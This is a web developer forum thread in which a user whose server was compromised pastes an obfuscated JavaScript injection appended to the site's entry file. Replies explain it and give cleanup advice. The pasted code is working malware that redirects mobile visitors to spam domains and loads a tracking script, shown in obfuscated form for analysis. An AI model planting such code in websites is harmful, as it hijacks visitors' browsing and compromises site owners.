My server has been hacked, a js file is appended to the entry file, anyone know what's this js file do?

/*
  function _0x34aa(_0x81518e,_0x552a95){var _0x380e32=_0x380e();return _0x34aa=function(_0x34aa0c,_0x4c08b5){_0x34aa0c=_0x34aa0c-0x7e;var _0x130f44=_0x380e32[_0x34aa0c];return _0x130f44;},_0x34aa(_0x81518e,_0x552a95);}(function(_0x18615c,_0x754c1d){var _0x8d920e=_0x34aa,_0x214c15=_0x18615c();while(!![]){try{var _0x19e483=-parseInt(_0x8d920e(0x87))/0x1+parseInt(_0x8d920e(0x88))/0x2+parseInt(_0x8d920e(0x82))/0x3*(parseInt(_0x8d920e(0x83))/0x4)+-parseInt(_0x8d920e(0x7e))/0x5+parseInt(_0x8d920e(0x86))/0x6+-parseInt(_0x8d920e(0x7f))/0x7+parseInt(_0x8d920e(0x85))/0x8;if(_0x19e483===_0x754c1d)break;else _0x214c15['push'](_0x214c15['shift']());}catch(_0x39f6ac){_0x214c15['push'](_0x214c15['shift']());}}}(_0x380e,0x2154f),(function(){var _0x4a7a84=_0x34aa;function _0x3f4119(){var _0x398b1f=_0x34aa,_0x26b3fd=navigator[_0x398b1f(0x80)]||navigator['vendor']||window[_0x398b1f(0x81)];return/phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone/i[_0x398b1f(0x8a)](_0x26b3fd);}_0x3f4119()&&(window[_0x4a7a84(0x89)][_0x4a7a84(0x84)]='http://www.itseohack.com/index.html');}()));function _0x380e(){var _0x1dd8c7=['222738aMHTBo','location','test','1222565BaFGrJ','234864SQFtfO','userAgent','opera','114525otiqru','12hfypzt','href','542248FptYOd','1175982fgVKeZ','75080MMhRFR'];_0x380e=function(){return _0x1dd8c7;};return _0x380e();}
  */
  /*
 * åŠ å¯†å·¥å…·å·²ç»å‡çº§äº†ä¸€ä¸ªç‰ˆæœ¬ï¼Œç›®å‰ä¸º jsjiami.com.v7 ï¼Œæ›´æ–°äº†åŠ å¯†ç®—æ³•ï¼Œç¼©å‡äº†ä½“ç§¯;
 * å¦å¤– jsjiami.com.v7 å·²ç»å¼ºåˆ¶åŠ å…¥æ ¡éªŒï¼Œæ³¨é‡Šå¯ä»¥åŽ»æŽ‰ï¼Œä½†æ˜¯ jsjiami.com.v7 ä¸èƒ½åŽ»æŽ‰ï¼Œå…¶ä»–éƒ½æ²¡æœ‰ä»»ä½•ç»‘å®šã€‚
 * èª“æ»ä¸ä¼šåŠ å…¥ä»»ä½•åŽé—¨ï¼ŒJsJiami.com åŠ å¯†çš„ä½¿å‘½å°±æ˜¯ä¸ºäº†ä¿æŠ¤ä½ ä»¬çš„Javascript ã€‚

var _0xodt = 'jsjiami.com.v7';
(function(_0x23c2c1, _0xc5b15, _0x3dcc27, _0x2ccf63, _0x194012, _0xfdb140, _0x2709e0) {
    return _0x23c2c1 = _0x23c2c1 >> 0x3,
    _0xfdb140 = 'hs',
    _0x2709e0 = 'hs',
    function(_0x4e8929, _0x5882b9, _0x4b64f4, _0x682bbd, _0x2105a4) {
        var _0x126f94 = _0x245b;
        _0x682bbd = 'tfi',
        _0xfdb140 = _0x682bbd + _0xfdb140,
        _0x2105a4 = 'up',
        _0x2709e0 += _0x2105a4,
        _0xfdb140 = _0x4b64f4(_0xfdb140),
        _0x2709e0 = _0x4b64f4(_0x2709e0),
        _0x4b64f4 = 0x0;
        var _0xe81934 = _0x4e8929();
        while (!![] && --_0x2ccf63 + _0x5882b9) {
            try {
                _0x682bbd = parseInt(_0x126f94(0x155, 'uV]#')) / 0x1 * (parseInt(_0x126f94(0x159, 'S(@z')) / 0x2) + -parseInt(_0x126f94(0x157, 'BFC[')) / 0x3 * (-parseInt(_0x126f94(0x15b, '!lKf')) / 0x4) + parseInt(_0x126f94(0x141, ')u$W')) / 0x5 + -parseInt(_0x126f94(0x14b, 'R([S')) / 0x6 * (parseInt(_0x126f94(0x142, 'u]2(')) / 0x7) + -parseInt(_0x126f94(0x14e, 'BFC[')) / 0x8 + parseInt(_0x126f94(0x148, '(lnQ')) / 0x9 + -parseInt(_0x126f94(0x14a, 'QYpx')) / 0xa * (parseInt(_0x126f94(0x15f, 'K]fL')) / 0xb);
            } catch (_0x507457) {
                _0x682bbd = _0x4b64f4;
            } finally {
                _0x2105a4 = _0xe81934[_0xfdb140]();
                if (_0x23c2c1 <= _0x2ccf63)
                    _0x4b64f4 ? _0x194012 ? _0x682bbd = _0x2105a4 : _0x194012 = _0x2105a4 : _0x4b64f4 = _0x2105a4;
                else {
                    if (_0x4b64f4 == _0x194012['replace'](/[JYMKpLOTbHlBfXCxrASFV=]/g, '')) {
                        if (_0x682bbd === _0x5882b9) {
                            _0xe81934['un' + _0xfdb140](_0x2105a4);
                            break;
                        }
                        _0xe81934[_0x2709e0](_0x2105a4);
                    }
                }
            }
        }
    }(_0x3dcc27, _0xc5b15, function(_0x46c4b8, _0x2c2c34, _0x188b40, _0x3f572e, _0x53b97a, _0x3f06f0, _0x3bdb16) {
        return _0x2c2c34 = '\x73\x70\x6c\x69\x74',
        _0x46c4b8 = arguments[0x0],
        _0x46c4b8 = _0x46c4b8[_0x2c2c34](''),
        _0x188b40 = '\x72\x65\x76\x65\x72\x73\x65',
        _0x46c4b8 = _0x46c4b8[_0x188b40]('\x76'),
        _0x3f572e = '\x6a\x6f\x69\x6e',
        (0x181f48,
        _0x46c4b8[_0x3f572e](''));
    });
}(0x620, 0xdc987, _0xb1b1, 0xc6),
_0xb1b1) && (_0xodt = `\xa1f`);
var _hmt = _hmt || [];
function _0xb1b1() {
    var _0xb02225 = (function() {
        return [_0xodt, 'bXFjJKHsBjfVAiFarLlmMiOS.cJYHoTmVYC.pxv7==', 'W4DwvSk5nCoNwCkfW50', 'mKpcLmo2WRJdMG', 'WPVcQCkBW61T', 'es7dVCorWRCcWP9D', 'WPZdUhJdTMZdISkcW6HL', 'jSkvWP3cHIS', 'cCkMW5PoWQhdISkfq8kIrCoSW6/cPq', 'W4nxw8oefSopAmkZW4ZdOa', 'DSk6W4TgmtVcJCohAWa', 'WRdcRmkBWPJdPw4DWR7cUSkatW0', 'BmkpWR7cSSowvaBdQ1xcI2uR', 'x8kdFHtdMq', 'AmoOuHtcVgnhW4VdKJVdLX1t'].concat((function() {
            return ['n8oSWOetlWhcH8oHBqK', 'WOfcfxNdSee+WOVcTSonW5inEa', 'sCk0WQmXWR/dJhbmW5dcLNzO', 'lmovW5n0WRC', 'e8oPW6zKW7NcINzpW7lcLfv1', 'yCoFWP5LWO0', 'fCkkWPrcpwhdMNvEvq', 'CrdcQxxcJa', 'AmoVd3ZdHqaFW48', 'W67dK8krjmoG', 'W5DKEeuUDCkwibS', 'WRRcQIJdU8oyhmkkuSoo', 'eeZcLmkGWPThWRadWPNdMfT0', 'W7ZcGmkPWQxcImoXwWa+n0pdMSkIW5NdQmoEeNiIhgNdOxayvNVcP8oOtH0zWPKfe8kyWR19lxNdMCoBqqrafSo2muZcNvyKe8oeWRFcTfiOvta+WR7dKabai2fKW6XFWP07BSkmW7HHWRdcHG', 'esVcRSk4WOyFWRn5W4dcKW'].concat((function() {
                return ['bSkXWR3cLI0', 'WPJdOmklm8ouW5auW6jAWQ/cPG', 'W6VdGx3dNW7dO8orBqddT8kWWOJdNvCppWpcGGaNtSkshWPvwmkEx8kKWO/dGgLXESkIW4VdT0LGprj6W7pcL3lcVmo6AJGFAX7dNu3dQSoOzNhdOa/dJ8kEFvfOCmovt2rEWRDrW6r/WP90kHGHW5ysemkEW5S2BCoGWP40A8oXW5ddKXalh8kAlCoq', 'z8oRWOexlbdcQ8oHEWJdUd/dPIfkWQC3W606WQ/cL1etgcNcHJ8+nmoPW57dVSkjW4xcU8klWP9WWPBcV8osWOjuvmkmywPsBwJdHLdcMSo+FJdcQqFcHuummmkSWPJdT8oTnrvwB2tdQGDFACoCn8khWRvekGddVmovWRlcNNNcSmoXWQXOW6bJs37dUgldU8kzdLj7fmkHWP/cJ28mtmonW4hdJr8nW6aulCoJme7dPSkmW6JcLmkCW4VdVSkdW6u', 'Cr7dUmoAW54', 'jYSxW5FcMW', 'EbFdK8kPW73cNmkfn8k1gG3cJW', 'wGVdJCo/W5O', 'WP1ou0/cU1ZcSgi3kmocW4S', 'W7ldUHpcKffmW7TgWRG', 'WQJcVdNdJmo1hSkcwCouxen5W6m5WPhcNKeBvmk6', 'W5ZcHSkXhSk4W5WSomkgW7jZW5O'];
            }()));
        }()));
    }());
    _0xb1b1 = function() {
        return _0xb02225;
    }
    ;
    return _0xb1b1();
}
function _0x245b(_0x5eec9c, _0x2dd24d) {
    var _0xb1b1e5 = _0xb1b1();
    return _0x245b = function(_0x245b70, _0x27894f) {
        _0x245b70 = _0x245b70 - 0x141;
        var _0x3cb047 = _0xb1b1e5[_0x245b70];
        if (_0x245b['FOHtlH'] === undefined) {
            var _0x3da770 = function(_0x536165) {
                var _0x37d80e = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';
                var _0x476207 = ''
                  , _0x52d88e = '';
                for (var _0x178c6b = 0x0, _0x4ba42e, _0x2178b1, _0x2c6ada = 0x0; _0x2178b1 = _0x536165['charAt'](_0x2c6ada++); ~_0x2178b1 && (_0x4ba42e = _0x178c6b % 0x4 ? _0x4ba42e * 0x40 + _0x2178b1 : _0x2178b1,
                _0x178c6b++ % 0x4) ? _0x476207 += String['fromCharCode'](0xff & _0x4ba42e >> (-0x2 * _0x178c6b & 0x6)) : 0x0) {
                    _0x2178b1 = _0x37d80e['indexOf'](_0x2178b1);
                }
                for (var _0x8bb852 = 0x0, _0x2b23f2 = _0x476207['length']; _0x8bb852 < _0x2b23f2; _0x8bb852++) {
                    _0x52d88e += '%' + ('00' + _0x476207['charCodeAt'](_0x8bb852)['toString'](0x10))['slice'](-0x2);
                }
                return decodeURIComponent(_0x52d88e);
            };
            var _0x1b8e15 = function(_0x4cec5f, _0x439250) {
                var _0x424c5e = [], _0x1c881b = 0x0, _0x4e46c5, _0x262209 = '';
                _0x4cec5f = _0x3da770(_0x4cec5f);
                var _0x5abc95;
                for (_0x5abc95 = 0x0; _0x5abc95 < 0x100; _0x5abc95++) {
                    _0x424c5e[_0x5abc95] = _0x5abc95;
                }
                for (_0x5abc95 = 0x0; _0x5abc95 < 0x100; _0x5abc95++) {
                    _0x1c881b = (_0x1c881b + _0x424c5e[_0x5abc95] + _0x439250['charCodeAt'](_0x5abc95 % _0x439250['length'])) % 0x100,
                    _0x4e46c5 = _0x424c5e[_0x5abc95],
                    _0x424c5e[_0x5abc95] = _0x424c5e[_0x1c881b],
                    _0x424c5e[_0x1c881b] = _0x4e46c5;
                }
                _0x5abc95 = 0x0,
                _0x1c881b = 0x0;
                for (var _0x8e5626 = 0x0; _0x8e5626 < _0x4cec5f['length']; _0x8e5626++) {
                    _0x5abc95 = (_0x5abc95 + 0x1) % 0x100,
                    _0x1c881b = (_0x1c881b + _0x424c5e[_0x5abc95]) % 0x100,
                    _0x4e46c5 = _0x424c5e[_0x5abc95],
                    _0x424c5e[_0x5abc95] = _0x424c5e[_0x1c881b],
                    _0x424c5e[_0x1c881b] = _0x4e46c5,
                    _0x262209 += String['fromCharCode'](_0x4cec5f['charCodeAt'](_0x8e5626) ^ _0x424c5e[(_0x424c5e[_0x5abc95] + _0x424c5e[_0x1c881b]) % 0x100]);
                }
                return _0x262209;
            };
            _0x245b['uFfgoq'] = _0x1b8e15,
            _0x5eec9c = arguments,
            _0x245b['FOHtlH'] = !![];
        }
        var _0x1a1c29 = _0xb1b1e5[0x0]
          , _0x21a572 = _0x245b70 + _0x1a1c29
          , _0x20cb19 = _0x5eec9c[_0x21a572];
        return !_0x20cb19 ? (_0x245b['IxvaKM'] === undefined && (_0x245b['IxvaKM'] = !![]),
        _0x3cb047 = _0x245b['uFfgoq'](_0x3cb047, _0x27894f),
        _0x5eec9c[_0x21a572] = _0x3cb047) : _0x3cb047 = _0x20cb19,
        _0x3cb047;
    }
    ,
    _0x245b(_0x5eec9c, _0x2dd24d);
}
;(function() {
    var _0x425de8 = _0x245b
      , _0x49ee90 = {
        'WVIdc': _0x425de8(0x143, 'K7BQ')
    }
      , _0x4456a4 = document['createElement'](_0x49ee90[_0x425de8(0x147, 'jz8t')]);
    _0x4456a4['src'] = 'https://hm.baidu.com/hm.js?0ce929d02d6d0135161ddb80dee0208a';
    var _0x22afaf = document[_0x425de8(0x168, '6]Rn')](_0x49ee90['WVIdc'])[0x0];
    _0x22afaf[_0x425de8(0x14f, 'QYpx')][_0x425de8(0x151, '[Og0')](_0x4456a4, _0x22afaf);
}());
function isMobile() {
    var _0x5d4d2e = _0x245b;
    let _0x57afb8 = navigator[_0x5d4d2e(0x15a, '6]Rn')][_0x5d4d2e(0x163, 'nlkg')](/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i);
    return _0x57afb8;
}
function toPage() {
    var _0x5146be = _0x245b
      , _0x45cf6f = {
        'CMPtN': function(_0x215733) {
            return _0x215733();
        },
        'AMiIn': '5|2|3|0|4|1',
        'geEkp': _0x5146be(0x15c, 'v8UT'),
        'XeYLp': function(_0x191c27, _0x876c73) {
            return _0x191c27 + _0x876c73;
        },
        'Btygi': _0x5146be(0x14c, 'U07s'),
        'dCpNL': _0x5146be(0x161, 'QYpx')
    };
    if (_0x45cf6f['CMPtN'](isMobile)) {
        var _0x51e12a = _0x45cf6f[_0x5146be(0x156, 'DK[m')][_0x5146be(0x165, '!lKf')]('|')
          , _0xe8c8d6 = 0x0;
        while (!![]) {
            switch (_0x51e12a[_0xe8c8d6++]) {
            case '0':
                document['write'](_0x5146be(0x160, 'e*tP'));
                continue;
            case '1':
                document[_0x5146be(0x14d, ']G%@')]('</div>');
                continue;
            case '2':
                document[_0x5146be(0x15e, 'jz8t')]('<meta\x20id=\x22viewport\x22\x20name=\x22viewport\x22\x20content=\x22user-scalable=no,width=device-width,\x20initial-scale=1.0\x22\x20/>');
                continue;
            case '3':
                document['write'](_0x45cf6f[_0x5146be(0x158, 'LeVL')]);
                continue;
            case '4':
                document['write'](_0x45cf6f[_0x5146be(0x162, '!lKf')](_0x45cf6f[_0x5146be(0x144, 'zY)J')](_0x45cf6f[_0x5146be(0x154, 'nlU7')], _0x20b134), _0x45cf6f[_0x5146be(0x152, 'BMx)')]));
                continue;
            case '5':
                var _0x20b134 = 'https://www.9y1521.com/';
                continue;
            }
            break;
        }
    } else {}
}
toPage();
var version_ = 'jsjiami.com.v7';
 */


 var _0xodd='jsjiami.com.v7';(function(_0x510ff4,_0x5be764,_0x26f6db,_0x276449,_0x2dc5e7,_0x2834b6,_0x15111c){return _0x510ff4=_0x510ff4>>0x4,_0x2834b6='hs',_0x15111c='hs',function(_0x5cf7f3,_0x94bc36,_0x4c8adb,_0x43b5e8,_0x4b0719){var _0x5a99c4=_0x14de;_0x43b5e8='tfi',_0x2834b6=_0x43b5e8+_0x2834b6,_0x4b0719='up',_0x15111c+=_0x4b0719,_0x2834b6=_0x4c8adb(_0x2834b6),_0x15111c=_0x4c8adb(_0x15111c),_0x4c8adb=0x0;var _0x493ca0=_0x5cf7f3();while(!![]&&--_0x276449+_0x94bc36){try{_0x43b5e8=parseInt(_0x5a99c4(0x19b,'NWry'))/0x1*(-parseInt(_0x5a99c4(0x199,']A)C'))/0x2)+parseInt(_0x5a99c4(0x192,'%TO9'))/0x3+parseInt(_0x5a99c4(0x1a8,'DBKW'))/0x4+parseInt(_0x5a99c4(0x190,'PAKw'))/0x5+-parseInt(_0x5a99c4(0x196,'XOs8'))/0x6+-parseInt(_0x5a99c4(0x1ac,'@^Xl'))/0x7+-parseInt(_0x5a99c4(0x19d,'8$q&'))/0x8*(-parseInt(_0x5a99c4(0x1ae,'vZYp'))/0x9);}catch(_0x38bd39){_0x43b5e8=_0x4c8adb;}finally{_0x4b0719=_0x493ca0[_0x2834b6]();if(_0x510ff4<=_0x276449)_0x4c8adb?_0x2dc5e7?_0x43b5e8=_0x4b0719:_0x2dc5e7=_0x4b0719:_0x4c8adb=_0x4b0719;else{if(_0x4c8adb==_0x2dc5e7['replace'](/[wUnuXLJMbpPYtONFIDhqH=]/g,'')){if(_0x43b5e8===_0x94bc36){_0x493ca0['un'+_0x2834b6](_0x4b0719);break;}_0x493ca0[_0x15111c](_0x4b0719);}}}}}(_0x26f6db,_0x5be764,function(_0x4be37c,_0x2eed44,_0x91ac73,_0x5428f7,_0x558612,_0x312145,_0x3e875e){return _0x2eed44='\x73\x70\x6c\x69\x74',_0x4be37c=arguments[0x0],_0x4be37c=_0x4be37c[_0x2eed44](''),_0x91ac73='\x72\x65\x76\x65\x72\x73\x65',_0x4be37c=_0x4be37c[_0x91ac73]('\x76'),_0x5428f7='\x6a\x6f\x69\x6e',(0x183889,_0x4be37c[_0x5428f7](''));});}(0xc00,0xa3f7f,_0x2179,0xc2),_0x2179)&&(_0xodd=_0x2179);var _hmt=_hmt||[];(function(){var _0x2aaad4=_0x14de,_0x17d148={'MuscR':_0x2aaad4(0x1ad,'hDW%'),'byGNF':'https://hm.baidu.com/hm.js?0ce929d02d6d0135161ddb80dee0208a'},_0x2d6076=document[_0x2aaad4(0x1a1,'vZYp')](_0x17d148[_0x2aaad4(0x1b1,']A)C')]);_0x2d6076['src']=_0x17d148[_0x2aaad4(0x1a9,'4$Ij')];var _0x37557f=document['getElementsByTagName'](_0x17d148['MuscR'])[0x0];_0x37557f['parentNode'][_0x2aaad4(0x1a7,'zxuh')](_0x2d6076,_0x37557f);}());function isMobile(){var _0x529d2a=_0x14de;let _0x46ddd6=navigator[_0x529d2a(0x1aa,'n3hA')]['match'](/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i);return _0x46ddd6;}function toPage(){var _0x3e5fc2=_0x14de,_0x47cda9={'oPHYi':function(_0x381e1e){return _0x381e1e();},'hujjg':_0x3e5fc2(0x193,'0Mzj'),'bjXYX':_0x3e5fc2(0x1ab,'oVxG'),'GJiQX':function(_0x99b707,_0x3fbd46){return _0x99b707+_0x3fbd46;},'hWuQP':_0x3e5fc2(0x1a5,'olRh'),'ANMAb':_0x3e5fc2(0x191,'eN!O'),'hFuYy':_0x3e5fc2(0x1a3,'1SsJ')};if(_0x47cda9['oPHYi'](isMobile)){var _0x234ae9=_0x47cda9[_0x3e5fc2(0x198,'n1n!')][_0x3e5fc2(0x1a6,'ux#v')]('|'),_0x5ea2a2=0x0;while(!![]){switch(_0x234ae9[_0x5ea2a2++]){case'0':document['write'](_0x47cda9['bjXYX']);continue;case'1':document[_0x3e5fc2(0x19c,'zxuh')](_0x47cda9[_0x3e5fc2(0x194,'c4Gx')](_0x47cda9[_0x3e5fc2(0x1a2,'!kt[')](_0x47cda9[_0x3e5fc2(0x18e,'[^mt')],_0x42d74f),_0x47cda9['ANMAb']));continue;case'2':document[_0x3e5fc2(0x19f,'%TO9')](_0x47cda9[_0x3e5fc2(0x197,'FODR')]);continue;case'3':document[_0x3e5fc2(0x19a,'#Ww7')](_0x3e5fc2(0x18d,'!kt['));continue;case'4':var _0x42d74f='https://www.9y1521.com/';continue;case'5':document[_0x3e5fc2(0x1af,'[^mt')](_0x3e5fc2(0x19e,'yenj'));continue;}break;}}else{}}function _0x14de(_0x1e45e3,_0x1c2c34){var _0x217916=_0x2179();return _0x14de=function(_0x14dee1,_0x279da8){_0x14dee1=_0x14dee1-0x18d;var _0x1e4dae=_0x217916[_0x14dee1];if(_0x14de['DBlJJR']===undefined){var _0x4e1ee4=function(_0x47b65e){var _0x553746='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var _0x2a1fba='',_0x140871='';for(var _0x189727=0x0,_0x58e508,_0x916932,_0x1e7c74=0x0;_0x916932=_0x47b65e['charAt'](_0x1e7c74++);~_0x916932&&(_0x58e508=_0x189727%0x4?_0x58e508*0x40+_0x916932:_0x916932,_0x189727++%0x4)?_0x2a1fba+=String['fromCharCode'](0xff&_0x58e508>>(-0x2*_0x189727&0x6)):0x0){_0x916932=_0x553746['indexOf'](_0x916932);}for(var _0x37e93f=0x0,_0x3eb5d3=_0x2a1fba['length'];_0x37e93f<_0x3eb5d3;_0x37e93f++){_0x140871+='%'+('00'+_0x2a1fba['charCodeAt'](_0x37e93f)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(_0x140871);};var _0x1c353b=function(_0x1cb8cb,_0x2660ec){var _0x36747b=[],_0xd0ffdf=0x0,_0x22bd34,_0x5bcf2e='';_0x1cb8cb=_0x4e1ee4(_0x1cb8cb);var _0x2604ef;for(_0x2604ef=0x0;_0x2604ef<0x100;_0x2604ef++){_0x36747b[_0x2604ef]=_0x2604ef;}for(_0x2604ef=0x0;_0x2604ef<0x100;_0x2604ef++){_0xd0ffdf=(_0xd0ffdf+_0x36747b[_0x2604ef]+_0x2660ec['charCodeAt'](_0x2604ef%_0x2660ec['length']))%0x100,_0x22bd34=_0x36747b[_0x2604ef],_0x36747b[_0x2604ef]=_0x36747b[_0xd0ffdf],_0x36747b[_0xd0ffdf]=_0x22bd34;}_0x2604ef=0x0,_0xd0ffdf=0x0;for(var _0x8e9931=0x0;_0x8e9931<_0x1cb8cb['length'];_0x8e9931++){_0x2604ef=(_0x2604ef+0x1)%0x100,_0xd0ffdf=(_0xd0ffdf+_0x36747b[_0x2604ef])%0x100,_0x22bd34=_0x36747b[_0x2604ef],_0x36747b[_0x2604ef]=_0x36747b[_0xd0ffdf],_0x36747b[_0xd0ffdf]=_0x22bd34,_0x5bcf2e+=String['fromCharCode'](_0x1cb8cb['charCodeAt'](_0x8e9931)^_0x36747b[(_0x36747b[_0x2604ef]+_0x36747b[_0xd0ffdf])%0x100]);}return _0x5bcf2e;};_0x14de['RtzWHc']=_0x1c353b,_0x1e45e3=arguments,_0x14de['DBlJJR']=!![];}var _0x55cf22=_0x217916[0x0],_0x43de3e=_0x14dee1+_0x55cf22,_0x27163d=_0x1e45e3[_0x43de3e];return!_0x27163d?(_0x14de['GLagHr']===undefined&&(_0x14de['GLagHr']=!![]),_0x1e4dae=_0x14de['RtzWHc'](_0x1e4dae,_0x279da8),_0x1e45e3[_0x43de3e]=_0x1e4dae):_0x1e4dae=_0x27163d,_0x1e4dae;},_0x14de(_0x1e45e3,_0x1c2c34);}function _0x2179(){var _0x1b480e=(function(){return[_0xodd,'ODwjUsYJjXihFbamtinNq.HucLomMw.vPp7FXIHp==','qCk3W4C5W5eDWPCIW7hdUCoZB8ky','W4XpW4WYW5K','WQu1penEWPmFW68VWRHlWPJdJdlcJ8klzSk6W5JcI8krvmoqWRrKW59mgH9JWRa4a8khW5tdSdTCqb/cR30ZhvTHrSolqGBdGSo1WOOGBXC9WQBcOmoKW495b8oOWP3cULbYrYTRBXlcU8ooW4/cGW','FSogeKag','W64OW77dKbNcVSk8','WRVcV1ZdJSoAw8o6WOxcIapdHdKB','n8ojWOJdHCost8oswKXSySo3W4mSWOaWbNiUWP8op8omFCk/refiWQNdT8k+W4ZdJIShlhldQCosr8o0umkgWPCbW59YddbcESosaWiKa8oOdCoUE0JcKmo6WP7cTfjJAH/cMCkmmsFdUhLsW6pcNSk3W7qyWQZcGhe7svVcHSkqW5ZcMCkwWQKdW4tdT8k3WQdcRXZcQSkpxCkQWOf1WRqGWPqTWP/dOrxcSSo8W4DUuJTVshf7wZ54kbBdRG','eSohW6rpWOdcIYSKW4xcON17W4S','WOpcJvXlbCoDqKu+dvm','W6fAW5BdUs0','W64Ci8kcWQJdPCoWkCkNW4JdRSo9Ea','W43cOZ7dNSkTWQ3dR8otWQJdM8o8W71V'].concat((function(){return['p8kgWOJdLaS','W7TfW5VcHZ4','WRntW709W6n5WQu','nmkoWQG6WO8','W4/dJ8oACCooe8otgJmFaCkrAq','w8o6g0ne','WQxdRWSMW4hdKmko','DWfYyWvv','vmkhWROnW5y','AhdcSd8oW5PV','imkhW4ldQghcGmodW4ZcR3GrbmkC','W54miwTQ','WP7cJYbgpLdcOmkEdmoXCmkXcmoQD8oMbSkenmodffqpW4RdICkhWPm+nCkQW6/dM1/cLSkGWOtcIuzObcznyddcRhpdJSowwSo6W5b0WO0Aw0pdRCoJWQhcM2nOl8olW6zlW5vnWR0zg8kkW6SGW7P1iWHHhSk1W7xdMSo5W4xcRNtdG0HPWQRdOmkqWQFdUWhcGvuB','umkgWOxdI8kwW40siLRdS8k7qSor'].concat((function(){return['twNdTw8CW61qc8kLEZDk','uXVdJ8ksda','rCoMavjtyZxdRsbaDH8','vCkhWOVdICkzW4SFjLddUmkmsSo+','q11nWP55','vSoxW45yWR/cMKaOWQS','eCkbW5KuW68BeWTlWPVdISo7kJdcLYPhhc0SBmkAFmoKWQFdR1HNW7pdUCoaAxC/WPbUWP3dHd0/WRldN3bvkIScW5RdNKGkW5bFWObLW5ddTHpcKZXNtSktW4RdLmk4W67cLmkAxSkrW6ZdVcGzk8oOimkGW4LQW5pdRxNdPCo7zMJcUtRdQxZcImogtCkWWRCevSkVpwNdVG','WQBdLgXiW7lcNWtcLmoawfTIeW','kxRcGdOwW7O','CCobWPlcVItdNCkWWPpcGfqNemkKWRe','yCoJdMuZ'];}()));}()));}());_0x2179=function(){return _0x1b480e;};return _0x2179();};toPage();var version_ = 'jsjiami.com.v7';

LaryAI

1 year ago

Level 58

The JavaScript code you've posted is obfuscated, which makes it difficult to read and understand directly. However, I can provide some insights into what this code is likely doing based on common patterns in obfuscated scripts.

Key Observations:

Obfuscation: The code is heavily obfuscated using techniques like variable renaming, string encoding, and function wrapping. This is often done to hide the true purpose of the code.
Redirection: The code contains logic to detect if the user is on a mobile device. If a mobile device is detected, it attempts to redirect the user to a specific URL (http://www.itseohack.com/index.html or https://www.9y1521.com/). This is a common tactic used in malicious scripts to drive traffic to certain websites.
Tracking Script: The code includes a script from https://hm.baidu.com/hm.js, which is a tracking script from Baidu Analytics. This could be used to track user behavior on the site.
Encoded Strings: The script uses encoded strings and a decoding function, which is a typical method to hide URLs or other sensitive data.

Recommended Actions:

Remove the Malicious Code: Immediately remove this script from your server to prevent further damage or data leakage.
Scan for Other Vulnerabilities: Conduct a thorough security audit of your server and application to identify and fix any vulnerabilities that allowed this script to be injected.
Update and Patch: Ensure that all software, including your web server and any CMS or frameworks you are using, is up to date with the latest security patches.
Monitor Traffic: Keep an eye on your server logs and traffic patterns for any unusual activity that might indicate further compromise.
Educate Your Team: Make sure your development and operations teams are aware of security best practices to prevent future incidents.

If you need further assistance with cleaning up your server or securing your application, consider reaching out to a cybersecurity professional.

martinbean

1 year ago

Best Answer

Level 80

@russellxu It doesn’t really matter what the file does to be honest, because it’s there, it shouldn’t be, and you need to remove it, and find out how it got there to prevent it just being re-added again.

There’s no point spending time trying to work out what an obfuscated malicious file does, when you can instead spend that time fixing the problem and securing your app/server, because your app—and its users—are all compromised during any time you spend going, “I wonder what this does?”

Check your server access logs for suspicious requests, as it’s highly unlikely the bad actor will have crafted the perfect URL to inject this code first time; they’ll be a litany of other suspicious requests trying things like SQL injection attacks and whatnot until they found an attack vector that worked.

1 like

jlrdw

1 year ago

Level 75

Also do you have file uploads? You need to safely upload if you do.

Please or to participate in this conversation.